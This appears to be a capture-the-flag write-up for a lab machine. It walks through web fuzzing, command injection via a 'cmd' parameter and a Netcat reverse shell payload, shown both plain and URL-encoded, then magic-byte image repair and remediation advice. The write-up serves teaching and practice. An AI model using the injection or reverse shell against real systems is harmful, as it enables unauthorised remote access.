Target IP: 10.10.x.x (Requires IP) Difficulty: Easy/Medium Objective: Web Access, Command Injection, and Forensic Data Recovery.

1. Executive Summary

“U.A. High School” is a Linux machine hosting a web server. Initial reconnaissance reveals a static website, but directory fuzzing uncovers a hidden assets directory. Further parameter fuzzing on a PHP script reveals a Command Injection vulnerability that returns Base64-encoded output. Initial access is gained via a reverse shell payload. The final flags are not obtained through traditional privilege escalation, but rather by downloading corrupted image files found on the server and repairing their Magic Bytes (File Headers) to reveal hidden data (Steganography).

Key TTPs (MITRE ATT&CK):

  • T1190 (Exploit Public-Facing App): Command Injection via cmd parameter.
  • T1027 (Obfuscated Files or Information): Base64 encoded responses and Steganography.
  • T1005 (Data from Local System): Exfiltrating images for local forensic analysis.
  • T1485 (Data Destruction/Manipulation): Recovering files with corrupted headers.

2. Enumeration

A. Network Scanning

nmap -sV -sC -A -T4 -Pn 10.10.x.x

Findings:

  • 80/tcp (HTTP): Apache Web Server.
  • 22/tcp (SSH): Closed/Filtered (initially).

B. Web Enumeration

  1. Browsing: The main page is static. However, the PHPSESSID cookie suggests PHP is running on the backend.
  2. Directory Fuzzing:
gobuster dir -u http://10.10.x.x/ -w /usr/share/wordlists/dirb/common.txt
  • Result: /assets directory found.
  • Deep Fuzzing: Inside /assets, we find index.php.

C. Parameter Fuzzing (The Injection Point)

We have /assets/index.php, but it displays nothing. We fuzz for parameters.

ffuf -u http://10.10.x.x/assets/index.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -mc all
  • Result: The parameter cmd returns a response.

3. Initial Access: Command Injection

A. The Vulnerability

The server executes the system command passed to cmd but encodes the output in Base64 before returning it to the browser.

Verification:

curl -s "http://10.10.x.x/assets/index.php?cmd=id" | base64 -d
# Output: uid=33(www-data) gid=33(www-data) ...

B. Gaining a Shell

To get a proper interactive shell, we inject a Netcat reverse shell payload. We must URL-encode the payload to ensure it executes correctly.

  1. Listener: nc -lvnp 4444
  2. Payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 4444 >/tmp/f

(URL Encoded for the browser): %72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%59%4f%55%52%2e%49%50%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66

Status: Shell as www-data.


4. Forensics: The Hidden Flags

A. Discovery

Enumerating the web directory (/var/www/html/assets/images) reveals two interesting files:

  • oneforall.jpg
  • yuei.jpg

We download them to our attacker machine:

wget http://10.10.x.x/assets/images/yuei.jpg
wget http://10.10.x.x/assets/images/oneforall.jpg

B. Analysis (Magic Bytes)

Trying to open oneforall.jpg fails. We suspect the file header (Magic Bytes) is corrupted.

1. Inspecting the Hex:

hexeditor oneforall.jpg
# or
xxd oneforall.jpg | head

We see bytes that do not match the standard JPEG header (FF D8 FF E0).

2. Repairing the File: We manually edit the first few bytes to match the correct signature for a JPEG.

  • Change: First bytes -> FF D8 FF E0 (Standard JPEG).
  • Save: The file is now a valid image.

3. Result: Opening the repaired image reveals the flag (Steganography/Embedded Text).

(Repeat the process for yuei.jpg if necessary, potentially checking for PNG headers 89 50 4E 47 if the extension is misleading).


5. Remediation (Blue Team)

  1. Input Validation:
  • The PHP script likely uses exec($_GET['cmd']) or system(). This is incredibly dangerous. Remove this functionality entirely.
  • If system interaction is needed, use specific APIs or allow-listed commands only.
  1. Web Server Hardening:
  • Disable directory listing (though fuzzing found it, listing makes it easier).
  • Restrict access to sensitive directories like /assets if they contain backup or raw files.
  1. File Integrity:
  • Monitor for changes to static assets (.jpg).
  • The fact that corrupted files were serving as flag containers implies a lack of integrity monitoring on web assets.